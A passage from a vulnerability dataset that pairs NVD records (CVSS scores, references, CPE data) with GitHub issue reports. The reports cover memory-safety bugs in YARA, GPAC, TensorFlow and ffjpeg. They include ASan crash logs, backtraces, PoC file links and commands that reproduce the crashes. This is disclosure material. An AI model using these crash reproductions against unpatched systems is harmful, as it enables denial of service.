0x0000800e4610: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800e4620: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800e4630: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0000800e4640: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00
=>0x0000800e4650:[04]f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
0x0000800e4660: 01 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
0x0000800e4670: 04 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
0x0000800e4680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800e4690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800e46a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==25743==ABORTING
```
Commit 605b2edf07ed8eb9a2c61ba22eb2e7c362f47ba7 introduced a configuration case called `YR_CONFIG_MAX_PROCESS_MEMORY_CHUNK `, which will treat the `void *src` pointer as a `uint64_t*` pointer (64bit). The dereferece operation after this will read 64bits from src.
https://github.com/VirusTotal/yara/blob/605b2edf07ed8eb9a2c61ba22eb2e7c362f47ba7/libyara/libyara.c#L381-L403
Note that, in cli/yara.c, a pointer to the 32bit integer `max_process_memory_chunk` is passed to `yr_set_configuration`. As a result, `yr_cfgs[name].ui64 = *(uint64_t *) src;` will read 64bits from a 32bit variable. This caused the ERROR reported by ASAN.
https://github.com/VirusTotal/yara/blob/605b2edf07ed8eb9a2c61ba22eb2e7c362f47ba7/cli/yara.c#L166
https://github.com/VirusTotal/yara/blob/605b2edf07ed8eb9a2c61ba22eb2e7c362f47ba7/cli/yara.c#L1371-L1372
A potential damage of this is that an attacker who obtains control of `max_process_memory_chunk`'s next 4 bytes in the memory can further set the higher 32bits of `yr_cfgs[name].ui64` to arbitrary values and launch exhaustive attacks. | Possible insecure pointer conversion in yr_set_configuration() leading to global-buffer-overflow | https://api.github.com/repos/VirusTotal/yara/issues/1616/comments | 3 | 2021-12-15T18:01:26Z | 2021-12-20T09:31:28Z | https://github.com/VirusTotal/yara/issues/1616 | 1,081,328,626 | 1,616 | 3,175 |
CVE-2022-24249 | 2022-02-04T19:15:08.100 | A Null Pointer Dereference vulnerability exists in GPAC 1.1.0 via the xtra_box_write function in /box_code_base.c, which causes a Denial of Service. This vulnerability was fixed in commit 71f9871. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2081"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2081"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E",
"versionEndExcluding": "2.0.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/gpac/gpac/issues/2081 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | **version info**:
```
MP4Box - GPAC version 1.1.0-DEV-rev1678-g92faba3-master
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --prefix=/path_to_gpac/build --enable-debug --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FAAD GPAC_HAS_MAD GPAC_HAS_LIBA52 GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_FFMPEG GPAC_HAS_JP2 GPAC_HAS_THEORA GPAC_HAS_VORBIS GPAC_HAS_XVID GPAC_HAS_LINUX_DVB
```
**poc**: [poc](https://github.com/dandanxu96/PoC/raw/main/gpac/gpac-xtra_box_write-null-pointer-dereference-poc)
**command**: MP4Box -hint -out /dev/null $poc$
**crash**:
```
root@d8a714203f6e:/path_to_gpac/build/bin# ./MP4Box -hint -out /dev/null poc
[iso file] Unknown box type t8Aak in parent moov
[iso file] Box "UNKN" is larger than container box
[iso file] Box "moov" size 211 (start 20) invalid (read 2209)
[iso file] Box "nmhd" (start 359) has 8 extra bytes
[iso file] Unknown box type dreu in parent dinf
[iso file] Box "UNKN" is larger than container box
[iso file] Missing dref box in dinf
[iso file] Box "dinf" size 36 (start 379) invalid (read 64)
[iso file] Unknown box type url in parent srpp
[iso file] Unknown box type srpp in parent srpp
[iso file] Box "UNKN" is larger than container box
[iso file] Box "srpp" size 1814 (start 415) invalid (read 1854)
[iso file] Unknown box type dre- in parent dinf
[iso file] Box "UNKN" is larger than container box
[iso file] Missing dref box in dinf
[iso file] Box "dinf" size 36 (start 2229) invalid (read 64)
[isom] invalid tag size in Xtra !
[isom] invalid tag size in Xtra !
[isom] not enough bytes in box Xtra: 46 left, reading 1836070003 (file isomedia/box_code_base.c, line 12754), skipping box
[iso file] Box "Xtra" (start 2265) has 60 extra bytes
[iso file] Unknown top-level box type 00000001
0.500 secs Interleaving
utils/bitstream.c:1053:6: runtime error: null pointer passed as argument 2, which is declared to never be null
```
Here is the trace reported by debugging. We can see that the `memcpy` function is called on line 1053 of `utils/bitstream.c`, which will copy the contents of the second parameter `data` to the buffer pointed to by the first parameter. Unfortunately, in this trace the `data` is 0 (NULL), causing the program to crash.
```
In file: /path_to_gpac/src/utils/bitstream.c
1048 case GF_BITSTREAM_FILE_READ:
1049 case GF_BITSTREAM_FILE_WRITE:
1050 if (bs->cache_write) {
1051 //if block fits in our write cache, write it
1052 if (bs->buffer_written + nbBytes < bs->cache_write_size) {
► 1053 memcpy(bs->cache_write+bs->buffer_written, data, nbBytes);
1054 bs->buffer_written+=nbBytes;
1055 return nbBytes;
1056 }
1057 //otherwise flush cache and use file write
1058 bs_flush_write_cache(bs);
pwndbg> backtrace
#0 gf_bs_write_data (bs=0x60f00000dc90, data=0x0, nbBytes=1) at utils/bitstream.c:1053
#1 0x00007ff9797a8f82 in xtra_box_write (s=0x60400000d590, bs=0x60f00000dc90) at isomedia/box_code_base.c:12814
#2 0x00007ff979816fb8 in gf_isom_box_write_listing (a=0x60400000d590, bs=0x60f00000dc90) at isomedia/box_funcs.c:1834
#3 0x00007ff979817737 in gf_isom_box_write (a=0x60400000d590, bs=0x60f00000dc90) at isomedia/box_funcs.c:1883
#4 0x00007ff9798b432c in WriteInterleaved (mw=0x7ffd2b3ab870, bs=0x60f00000dc90, drift_inter=GF_TRUE) at isomedia/isom_store.c:1963
#5 0x00007ff9798bb1ca in WriteToFile (movie=0x616000009c80, for_fragments=GF_FALSE) at isomedia/isom_store.c:2549
#6 0x00007ff9798574d1 in gf_isom_write (movie=0x616000009c80) at isomedia/isom_read.c:600
#7 0x00007ff979857a3f in gf_isom_close (movie=0x616000009c80) at isomedia/isom_read.c:624
#8 0x00000000004413cc in mp4boxMain (argc=5, argv=0x7ffd2b3b0478) at main.c:6547
#9 0x00000000004416f2 in main (argc=5, argv=0x7ffd2b3b0478) at main.c:6601
#10 0x00007ff975d2e840 in __libc_start_main (main=0x4416d2 <main>, argc=5, argv=0x7ffd2b3b0478, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7ffd2b3b0468) at ../csu/libc-start.c:291
#11 0x000000000040fd09 in _start ()
```
I tracked the null assignment of `data` in `isomedia/box_code_base.c`. `data2` is initialized to NULL in line 12743. When the value of `prop_size` is greater than 4 ( line 12764 ), the program will allocate a memory chunk to `data2` ( line 12769 ). Otherwise, `data2` will remain NULL and will be assigned to `tag->prop_value` in line 12777.
In my crash, `prop_size` was set to 1 causing `tag->prop_value` to be NULL. The `tag` is then added to `ptr->tags` for subsequent access ( line 12779).
https://github.com/gpac/gpac/blob/5d68ccd1fa4a5a76cf8db31a33cfb4a2fe2bd4ad/src/isomedia/box_code_base.c#L12736-L12786
When the program executes to `xtra_box_write`, it will get a `tag` from `ptr->tags` ( line 12801 ), and pass `tag->prop_value` to the second parameter of `gf_bs_write_data` ( line 12814 ), which eventually results in `data` being NULL.
Although the program judges whether `tag->prop_value` is 0 in line 12805, it does not change the execution flow of the program and the value of `tag->prop_value`.
https://github.com/gpac/gpac/blob/5d68ccd1fa4a5a76cf8db31a33cfb4a2fe2bd4ad/src/isomedia/box_code_base.c#L12791-L12817
Hope my analysis will help.
| Null Pointer Dereference when dealing with XtraBox | https://api.github.com/repos/gpac/gpac/issues/2081/comments | 0 | 2022-01-28T10:38:34Z | 2022-01-28T16:00:46Z | https://github.com/gpac/gpac/issues/2081 | 1,117,248,312 | 2,081 | 3,176 |
CVE-2022-23562 | 2022-02-04T23:15:13.843 | Tensorflow is an Open Source Machine Learning Framework. The implementation of `Range` suffers from integer overflows. These can trigger undefined behavior or, in some scenarios, extremely large allocations. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.7,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/f0147751fd5d2ff23251149ebad9af9f03010732"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/52676"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/pull/51733"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-qx3f-p745-w4hr"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/f0147751fd5d2ff23251149ebad9af9f03010732"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/52676"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/pull/51733"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-qx3f-p745-w4hr"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "688150BF-477C-48FC-9AEF-A79AC57A6DDC",
"versionEndExcluding": null,
"versionEndIncluding": "2.5.2",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C9E69B60-8C97-47E2-9027-9598B8392E5D",
"versionEndExcluding": null,
"versionEndIncluding": "2.6.2",
"versionStartExcluding": null,
"versionStartIncluding": "2.6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:2.7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2EDFAAB8-799C-4259-9102-944D4760DA2C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"190"
] | 190 | https://github.com/tensorflow/tensorflow/issues/52676 | [
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | <em>Please make sure that this is a bug. As per our
[GitHub Policy](https://github.com/tensorflow/tensorflow/blob/master/ISSUES.md),
we only address code/doc bugs, performance issues, feature requests and
build/installation issues on GitHub. tag:bug_template</em>
**System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): all
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: n/a
- TensorFlow installed from (source or binary): source
- TensorFlow version (use command below): git HEAD
- Python version: 3.6.8
- Bazel version (if compiling from source): 3.7.2
- GCC/Compiler version (if compiling from source): 10.3.0
- CUDA/cuDNN version: n/a
- GPU model and memory: n/a
You can collect some of this information using our environment capture
[script](https://github.com/tensorflow/tensorflow/tree/master/tools/tf_env_collect.sh)
You can also obtain the TensorFlow version with:
1. TF 1.0: `python -c "import tensorflow as tf; print(tf.GIT_VERSION, tf.VERSION)"`
2. TF 2.0: `python -c "import tensorflow as tf; print(tf.version.GIT_VERSION, tf.version.VERSION)"`
**Describe the current behavior**
https://github.com/tensorflow/tensorflow/blob/0b67dee3f02e2e055230ca6dd6cc7d090af72baa/tensorflow/core/ops/math_ops.cc#L1484 has undefined behaviour when size is greater than std::numeric_limits<int64_t>::max()
This leads to the unit test RangeTest.testLargeStarts failing on AARCH64 where the g++ implements different behaviour from x86. On x86 the result of the cast is large and -ve, on AARCH64 it is large and +ve. Neither is incorrect as the behaviour of casting into a type that cannot hold the value is undefined.
**Describe the expected behavior**
The code should be written to avoid relying on undefined behaviour of the source.
**[Contributing](https://www.tensorflow.org/community/contribute)**
- Do you want to contribute a PR? (yes/no): yes
- Briefly describe your candidate solution(if contributing):
Test the variable 'size' for exceeding the greatest possible value that can be safely cast to int64_t and throw an error if found.
**Standalone code to reproduce the issue**
Provide a reproducible test case that is the bare minimum necessary to generate
the problem. If possible, please share a link to Colab/Jupyter/any notebook.
$ bazel test --flaky_test_attempts=3 --test_output=all --cache_test_results=no --remote_http_cache="" --remote_cache_proxy="" --noremote_accept_cached --config=nonccl --verbose_failures -- //tensorflow/python/kernel_tests:init_ops_test
**Other info / logs** Include any logs or source code that would be helpful to
diagnose the problem. If including tracebacks, please include the full
traceback. Large logs and files should be attached.
======================================================================
ERROR: testLargeStarts (__main__.RangeTest)
RangeTest.testLargeStarts
----------------------------------------------------------------------
Traceback (most recent call last):
File "/home/builder/.cache/bazel/_bazel_builder/9dc2dbd69dc3512cedb530e1521082e7/execroot/org_tensorflow/bazel-out/aarch64-opt/bin/tensorflow/python/kernel_tests/init_ops_test.runfiles/org_tensorflow/tensorflow/python/kernel_tests/init_ops_test.py", line 553, in testLargeStarts
v = math_ops.range(start=-1e+38, limit=1)
File "/home/builder/.cache/bazel/_bazel_builder/9dc2dbd69dc3512cedb530e1521082e7/execroot/org_tensorflow/bazel-out/aarch64-opt/bin/tensorflow/python/kernel_tests/init_ops_test.runfiles/org_tensorflow/tensorflow/python/util/traceback_utils.py", line 141, in error_handler
return fn(*args, **kwargs)
File "/home/builder/.cache/bazel/_bazel_builder/9dc2dbd69dc3512cedb530e1521082e7/execroot/org_tensorflow/bazel-out/aarch64-opt/bin/tensorflow/python/kernel_tests/init_ops_test.runfiles/org_tensorflow/tensorflow/python/util/dispatch.py", line 1092, in op_dispatch_handler
return dispatch_target(*args, **kwargs)
File "/home/builder/.cache/bazel/_bazel_builder/9dc2dbd69dc3512cedb530e1521082e7/execroot/org_tensorflow/bazel-out/aarch64-opt/bin/tensorflow/python/kernel_tests/init_ops_test.runfiles/org_tensorflow/tensorflow/python/ops/math_ops.py", line 2113, in range
return gen_math_ops._range(start, limit, delta, name=name)
File "/home/builder/.cache/bazel/_bazel_builder/9dc2dbd69dc3512cedb530e1521082e7/execroot/org_tensorflow/bazel-out/aarch64-opt/bin/tensorflow/python/kernel_tests/init_ops_test.runfiles/org_tensorflow/tensorflow/python/ops/gen_math_ops.py", line 7737, in _range
_ops.raise_from_not_ok_status(e, name)
File "/home/builder/.cache/bazel/_bazel_builder/9dc2dbd69dc3512cedb530e1521082e7/execroot/org_tensorflow/bazel-out/aarch64-opt/bin/tensorflow/python/kernel_tests/init_ops_test.runfiles/org_tensorflow/tensorflow/python/framework/ops.py", line 7131, in raise_from_not_ok_status
raise core._status_to_exception(e) from None # pylint: disable=protected-access
tensorflow.python.framework.errors_impl.ResourceExhaustedError: OOM when allocating tensor with shape[9223372036854775807] and type float on /job:localhost/replica:0/task:0/device:CPU:0 by allocator cpu [Op:Range]
| Undefined behaviour in Range | https://api.github.com/repos/tensorflow/tensorflow/issues/52676/comments | 3 | 2021-10-26T11:38:05Z | 2021-12-17T03:28:10Z | https://github.com/tensorflow/tensorflow/issues/52676 | 1,036,189,142 | 52,676 | 3,177 |
CVE-2021-44956 | 2022-02-08T15:15:07.643 | Two Heap based buffer overflow vulnerabilities exist in ffjpeg through 01.01.2021. It is similar to CVE-2020-23852. Issues that are in the jfif_decode function at ffjpeg/src/jfif.c (line 552) could cause a Denial of Service by using a crafted jpeg file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/rockcarry/ffjpeg/issues/43"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/rockcarry/ffjpeg/issues/43"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rockcarry:ffjpeg:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FC5B8CBB-E98C-4585-BE42-32D0114A7F48",
"versionEndExcluding": null,
"versionEndIncluding": "2021-01-01",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/rockcarry/ffjpeg/issues/43 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"rockcarry",
"ffjpeg"
] | **Describe**
Two Heap-buffer-overflows were discovered in ffjpeg. The issues are being triggered in function jfif_decode at jfif.c:552:31 and 552:38.
Found by **Cem Onat Karagun of Diesec**
**System info**
OS version : Ubuntu 21.04
ffjpeg Version : master [0fa4cf8a86](https://github.com/rockcarry/ffjpeg/commit/0fa4cf8a86d7f23)
**Reproduce**
Compile ffjpeg with address sanitizer.
```
CCFLAGS = -Wall -g -fsanitize=address
```
**POC Files:**
[decode_poc1.zip](https://github.com/rockcarry/ffjpeg/files/6704516/decode_poc1.zip)
[decode_poc2.zip](https://github.com/rockcarry/ffjpeg/files/6704517/decode_poc2.zip)
Run POCs with the commands below.
```
$ ffjpeg -d decode_poc1
$ ffjpeg -d decode_poc2
```
**Asan output-1:**
```
=================================================================
==3469985==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000010 at pc 0x00000030d50c bp 0x7ffc93e360f0 sp 0x7ffc93e360e8
READ of size 4 at 0x602000000010 thread T0
#0 0x30d50b in jfif_decode /src/src/jfif.c:552:31
#1 0x3035f0 in main /src/src/ffjpeg.c:24:9
#2 0x7f3772bef564 in __libc_start_main csu/../csu/libc-start.c:332:16
#3 0x2515fd in _start (/REDACTED/ffjpeg/src/ffjpeg+0x2515fd)
0x602000000011 is located 0 bytes to the right of 1-byte region [0x602000000010,0x602000000011)
allocated by thread T0 here:
#0 0x2cc85d in malloc (/REDACTED/ffjpeg/src/ffjpeg+0x2cc85d)
#1 0x309025 in jfif_decode /src/src/jfif.c:443:21
#2 0x3035f0 in main /src/src/ffjpeg.c:24:9
#3 0x7f3772bef564 in __libc_start_main csu/../csu/libc-start.c:332:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /src/src/jfif.c:552:31 in jfif_decode
Shadow bytes around the buggy address:
0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c047fff8000: fa fa[01]fa fa fa 01 fa fa fa 01 fa fa fa fa fa
0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap:
```
**Asan output-2:**
```
=================================================================
==3487109==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000010 at pc 0x00000030d52a bp 0x7ffe17b50930 sp 0x7ffe17b50928
READ of size 4 at 0x602000000010 thread T0
#0 0x30d529 in jfif_decode /src/src/jfif.c:552:38
#1 0x3035f0 in main /src/src/ffjpeg.c:24:9
#2 0x7fec13038564 in __libc_start_main csu/../csu/libc-start.c:332:16
#3 0x2515fd in _start (/REDACTED/ffjpeg/src/ffjpeg+0x2515fd)
0x602000000011 is located 0 bytes to the right of 1-byte region [0x602000000010,0x602000000011)
allocated by thread T0 here:
#0 0x2cc85d in malloc (/REDACTED/ffjpeg/src/ffjpeg+0x2cc85d)
#1 0x309068 in jfif_decode /src/src/jfif.c:444:21
#2 0x3035f0 in main /src/src/ffjpeg.c:24:9
#3 0x7fec13038564 in __libc_start_main csu/../csu/libc-start.c:332:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /src/src/jfif.c:552:38 in jfif_decode
Shadow bytes around the buggy address:
0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c047fff8000: fa fa[01]fa fa fa 01 fa fa fa fa fa fa fa fa fa
0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3487109==ABORTING
``` | Heap-buffer-overflows in jfif_decode() at jfif.c:552:31 and 552:38 | https://api.github.com/repos/rockcarry/ffjpeg/issues/43/comments | 1 | 2021-06-23T19:48:31Z | 2021-12-07T20:05:06Z | https://github.com/rockcarry/ffjpeg/issues/43 | 928,585,823 | 43 | 3,178 |
CVE-2021-44957 | 2022-02-08T15:15:07.687 | Global buffer overflow vulnerability exist in ffjpeg through 01.01.2021. It is similar to CVE-2020-23705. Issue is in the jfif_encode function at ffjpeg/src/jfif.c (line 708) could cause a Denial of Service by using a crafted jpeg file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
